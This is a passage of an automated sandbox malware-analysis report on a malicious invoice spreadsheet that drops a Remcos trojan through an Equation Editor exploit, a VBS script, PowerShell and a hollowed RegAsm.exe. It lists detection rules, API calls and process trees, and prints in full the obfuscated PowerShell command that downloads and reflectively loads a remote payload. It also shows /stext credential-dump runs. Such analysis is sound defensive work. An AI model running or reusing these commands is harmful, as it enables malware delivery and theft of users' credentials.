                    Source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicesweetthingsentiretimesheneedtogetmebackwithverynicepersonwhowillingtogetniceworthfulthingsalwaysinhandsweetnesshaveforthebiscoutwhichieatedwith____verynic[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5BBC488.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: bhvE936.tmp.20.drBinary or memory string: org.slneighbors
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@19/37@17/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,20_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,22_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,20_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,19_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,19_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,19_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\33930000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0BYJUE
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA6F8.tmpJump to behavior
                    Source: invoice_45009.xlsOLE indicator, Workbook stream: true
                    Source: 33930000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.503949104.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: invoice_45009.xlsReversingLabs: Detection: 13%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wgfwwugimmoks"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\hispxnqjaugxdnkyl"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/NoDete'+'ctOn'+'/NoDetect'+'On/refs'+'/heads/mai'+'n/'+'Deta'+'hN'+'oth-V.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'Co'+'n'+'tent = '+'(New'+'-'+'Ob'+'ject S'+'y'+'s'+'tem.Net.WebCl'+'i'+'ent).D'+'o'+'wn'+'loadStrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryC'+'ontent'+' = ['+'Sy'+'stem'+'.'+'C'+'onvert]::Fr'+'o'+'m'+'B'+'ase64'+'Strin'+'g({1}base64C'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[Reflec'+'t'+'ion'+'.Assem'+'bly]::Load'+'({'+'1'+'}'+'b'+'inar'+'yCont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'IO.Home]::VAI({0}tx'+'t.R'+'ESS'+'SD'+'R/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}Re'+'g'+'Asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [chaR]34,[chaR]36,[chaR]39) | .( $SHELLId[1]+$ShEllId[13]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wgfwwugimmoks"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\hispxnqjaugxdnkyl"Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
